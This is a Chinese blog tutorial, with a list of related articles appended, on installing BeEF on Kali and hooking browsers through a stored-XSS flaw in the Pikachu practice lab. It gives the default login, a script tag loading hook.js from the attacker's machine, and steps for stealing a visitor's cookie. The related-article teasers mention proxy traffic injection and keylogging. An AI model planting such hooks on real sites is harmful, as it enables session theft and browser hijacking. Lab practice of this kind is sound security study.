beef-xss安装与使用

最新推荐文章于 2024-03-22 16:59:00 发布
最新推荐文章于 2024-03-22 16:59:00 发布
阅读量3.2k 收藏 22
点赞数 3
分类专栏: 渗透工具使用 文章标签: xss 安全 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43623271/article/details/121777821
版权

文章目录

kali安装与更新软件源

传送门

beef-xss安装

  1. sudo apt-get install beef-xss
  2. sudo beef-xss
  3. 第一次启动beef要修改密码,要仔细看清楚
    在这里插入图片描述

快速上手beef-xss

http://127.0.0.1:3000/ui/panel
beef的管理面板
在这里插入图片描述
输入自己的账号密码默认beef beef

在这里插入图片描述
这样就能进入到管理页面
在这里插入图片描述
查看kali的ip地址
在这里插入图片描述
构造下面js代码,想办法给其他人的浏览器去执行
<script src=“http://192.168.159.157:3000/hook.js”></script>(ip用你自己kali的ip)

这里只展示一种方法

把<script src=“http://192.168.159.157:3000/hook.js”></script>放在有存储型xss漏洞的网页里,等肉鸡去访问就可以了
这里利用pikachu的存储型漏洞

虚拟机kali ip 192.168.159.157
虚拟机pikachu服务器ip 192.168.159.132
我自己本机ip 192.168.159.1

本机提交<script src=“http://192.168.159.157:3000/hook.js”></script>到留言板
在这里插入图片描述
提交之后,beef管理面板多出了一台肉鸡(是我自己的真机)和Current Brower当前浏览器的选项
在这里插入图片描述
这里主要使用Commands下的Browser模块进行获取信息
在这里插入图片描述
简单获取个cookie
在这里插入图片描述
到logs查看结果,需要点击以下刷新图标,可以看到成功获取cookie
在这里插入图片描述

这里我删除了留言
在这里插入图片描述
查看beef管理面板,之前在线的主机已经不见了,offline(离线)主机多出一台
在这里插入图片描述
主机浏览别的页面,beef面板也会显示主机离线
结论:主机要在那串代码的地方才会被控制(可能有其他方法维持会话我不知道而已把)

关闭beef-xss进程

在这里插入图片描述

当然还有很多功能这里先不介绍,以后有时间写篇文章详细介绍

活着Viva
关注
  • 3
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web应用安全:XSS通过JavaScript攻击(实验).docx
06-20
XSS通过JavaScript攻击 一、实验目的 了解XSS的有关知识; 了解XSS通过JavaScript实际操作; 了解XSS的攻击原理。 二、实验内容 在Kali上安装beef-xss工具; 在站点上进行XSS JavaScript攻击。 (附加题)使用beef尝试更多XSS JavaScript功能。 三、实验内容与步骤 在Kali上安装beef-xss工具: 1.1、首先打开Kali,将kali的下载源换成国内中科大的源,在root权限下输入命令:vim /etc/apt/sources.list打开apt源。 1.2、然后可以将所有内容都删掉或者注释掉,然后输入两行内容,然后保存退出,输入时点击a,然后开始输入,输入结束后点击Esc然后输入wq按回车实现保存退出。 deb /kali kali-rolling main non-free contrib deb-src /kali kali-rolling main non-free contrib 1.3、输入命令:apt-get update,更新apt。 1.4、然后再命令行输入:sudo apt-get instal
vasp.5.4.4&beef-src.tar.xz
03-20
VASP+BEEF beef-vdW全称为Bayesian error estimation functional with van der Waals correlation, 是DTU在2012年做出来的一个新泛函,目前和Quantum Espresso,VASP,GPAW均有接口。具体的编译过程可以参考SUNCAT - Software和 BEEF Functional Software。 把beef编译到VASP里,首先要编译libbeef 1 编译和安装BEEF $ cd libbeef $ chmod +x configure $ ./configure CC=mpicc --prefix=/opt/software/beef $ make $ make install 2 修改VASP makefile.include makefile.include需要稍作修改(CPP_OPTIONS里添加-Dlibbeeef,LLIBS里添加-Lpathtolibbeef -lbeef) CPP_OPTIONS= -DMPI -DHOST=\"IFC91_ompi\" -DIFC \ -DCACHE_SIZE=4000 -DPGF90 -Davoidalloc \ -DMPI_BLOCK=8000 -DscaLAPACK -Duse_collective \ -DnoAugXCmeta -Duse_bse_te \ -Duse_shmem -Dtbdyn -Dlibbeef ...... BEEF = -L/opt/software/beef/lib -lbeef ...... LLIBS = $(SCALAPACK) $(LAPACK) $(BLAS) $(BEEF) ...... 3 编译VASP $ make
XSS漏洞及其工具Beef使用
最新发布
ytdd66的博客
03-22 741
XSS(Cross Site Scripting,跨站脚本漏洞)漏洞,又叫 CSS 漏洞,是最常见的 Web 应用程序漏洞。其主要原理是当动态页面中插入的内容含有特殊字符(如
squid3-beEF:概念证明 - 使用 squid url 重写功能“劫持”代理流量并将 BeEF 负载注入其中
06-23
Squid3-beEF 概念证明 - 使用 url 重写功能“劫持”代理流量并将负载注入其中。 要求 PHP 5.3 阿帕奇 mod_php 安装 将 rewrite.php 和 payload.js 复制到 apache 文档根目录 使用以下命令使 rewrite.php 可执行chmod +x /rewrite.php 编辑 /etc/squid3/squid.conf 并添加以下行url_rewrite_program /rewrite.php 将 payload.js 中的 #_ BEEFURL _# 更改为 BeEF Hook URL 创建空文件夹并允许所有用户写入 mkdir -p /有效载荷 chmod 0777 /有效载荷 一定要重启squid3(sudo service squid3 restart)来刷新更改。
beef-xss浏览器劫持
weixin_43225966的博客
04-19 721
beef-xss浏览器劫持复现
kali 中安装 beef-xss
挖到0day了吗?
02-27 409
XSS攻击(Cross-Site Scripting)是指攻击者在网页中注入恶意脚本代码,使受害者在浏览器中运行该脚本,从而达到攻击目的。beef是一种利用浏览器漏洞的攻击工具,可以在浏览器端运行恶意脚本。本文将介绍安装beef。新版的kail已经不自带beef工具了,需要自己下载。
BeEF-XSS详细使用教程
一个懒鬼的博客
05-10 6363
BeEF-XSS简介 BeEF-XSS是一款非常强大的web框架攻击平台,集成了许多payload,可以实现许多功能! 启动BeFF-XSS 关于kali没有安装beef可以参考下图: BeEF-XSS管理登录页面 用户名默认为beef,密码在首次启动beef-xss时需要手动设置。(启动beef-xss会自动打开浏览器) BeEF-XSS主页面介绍 Hocked Browers online browers 在线浏览器 offline browers 离线浏览..
beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等
Martin-share的博客
02-12 9004
beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等
xss-工具-Beef-Xss安装以及使用
weixin_44257023的博客
07-24 5812
xss-工具-Beef-Xss安装以及使用
beef-installer:用于发行版和Termux的BeEF安装程序!
04-17
使用它以root身份运行: (为了): git clone https://github.com/tony23x/beef-install.git cd beef-installer;ls bash install.sh python3 beef-installer.py准备好了! 如果是disro,则牛肉目录将位于环境...
raylib-beef:用于Beef编程语言的raylib绑定
05-06
雷利比牛肉raylib-beef是Raylib 3.1 dev的Beef包装器库,这是一个简单易用的库。 结合Beef编程语言的优势,制作游戏...)进行更高的抽象快速入门(使用Beef IDE) 下载raylib-beef并将其复制到以下位置: C:\ Progra
Web安全 XSS漏洞的利用(Beef工具)(点击链接就被黑的技术.)
网络安全领域___专研者.
03-18 3800
XSS漏洞的 概括: XSS又叫CSS(Cross Site Script)跨站脚本攻击,指的是攻击者在Web页面,插入恶意JS代码,当用户浏览该页之时,嵌入其中JS代码就会被执行,从而达到攻击的目的.(包含:收集用户的Cookie,添加账号,修改密码,提高用户权限等等.)
利用 BeEF 执行 XSS 攻击的总结
weixin_71139244的博客
05-27 943
跨站脚本攻击,简称XSS,是一种网站应用程序的安全漏洞攻击,属于代码注入的一种;与其他攻击相比,XSS攻击所带来的危害更大。跨站脚本攻击XSS,是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。
XSS攻击(5), beef-xss 平台
探测???
10-21 343
界面的内容包括 时间, 浏览器版本, cookie, 操作系统版本, cpu/gpu版本等.打开木马测试页面后, 浏览器就处于被控制状态, 可以回到beef平台中进一步操作.凡是访问木马网站的用户, 浏览器每隔1秒会向beef控制平台发送数据, 保持监视.打开目标网站存在XSS漏洞的位置, 将木马注入提交. 比如注入到留言板中.注入成功后, 所有来访问木马网站的用户浏览器将被beef平台记录和控制.回到beef平台, 在左侧即可看到被控制的木马网站, 以及访问它的用户.界面控制用户的浏览器执行各种命令.
XSS漏洞利用工具BeEF
RockHan
11-06 317
BeEF是Browser Exploitation Framework的缩写。随着人们越来越多地关注针对包括移动客户端在内的客户端的网络传播攻击,BeEF使专业的渗透测试人员可以使用客户端攻击向量来评估目标环境的实际安全状况。与其他安全框架不同,BeEF超越了硬化的网络边界和客户端系统,并在一个门户开放的环境中检查可利用性。BeEF将钩挂一个或多个Web浏览器,并将其用作启动定向命令模块的滩头堡,...
Beef-Xss 浏览器攻击框架的使用
XXokok的博客
10-01 382
Beef-Xss 浏览器攻击框架的使用,如果导致目标引入了外部JS文件,则会沦为“肉鸡”
kali如何安装beef-xss
05-14
要在Kali Linux上安装BeEF(The Browser Exploitation Framework),请按照以下步骤进行: 1. 打开终端并更新软件包列表: ``` sudo apt-get update ``` 2. 安装BeEF: ``` sudo apt-get install beef-xss ``` 3. 安装完成后,启动BeEF: ``` sudo beef-xss ``` 4. 在浏览器中打开“http://127.0.0.1:3000/ui/panel”以访问BeEF控制面板。 注意:BeEF是用于演示和教育目的的工具,不应用于非法活动。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值